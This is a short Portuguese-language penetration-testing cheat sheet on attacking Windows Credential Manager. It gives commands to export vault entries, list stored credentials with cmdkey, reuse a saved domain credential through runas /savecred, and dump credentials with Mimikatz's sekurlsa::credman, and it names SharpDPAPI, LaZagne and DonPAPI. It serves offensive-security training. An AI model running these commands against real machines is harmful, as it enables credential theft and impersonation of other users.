# Attacking Windows Credential Manager

**Windows Vault e Gerenciador de Credenciais**

* É possível exportar os Cofres do Windows para arquivos `.crd` através do Painel de Controle - `windows credential` ou com o seguinte comando

```
rundll32 keymgr.dll,KRShowKeyMgr
```

* Podemos usar [o comando cmdkey](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey) para enumerar as credenciais armazenadas no perfil do usuário atual:

```
cmdkey /list
```

* Se nos encontrarmos com credenciais associadas ao domínio, podemos nos passar por ela executando o `runas` 

```
runas /savecred /user:SRV01\mcharles cmd
```

* **Extraindo credenciais com Mimikatz**

```powershell
mimikatz.exe
# privilege::debug
# sekurlsa::credman
```

{% hint style="info" %}
Outras ferramentas que podem ser usadas para enumerar e extrair credenciais armazenadas incluem [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) , [LaZagne](https://github.com/AlessandroZ/LaZagne) e [DonPAPI](https://github.com/login-securite/DonPAPI) .
{% endhint %}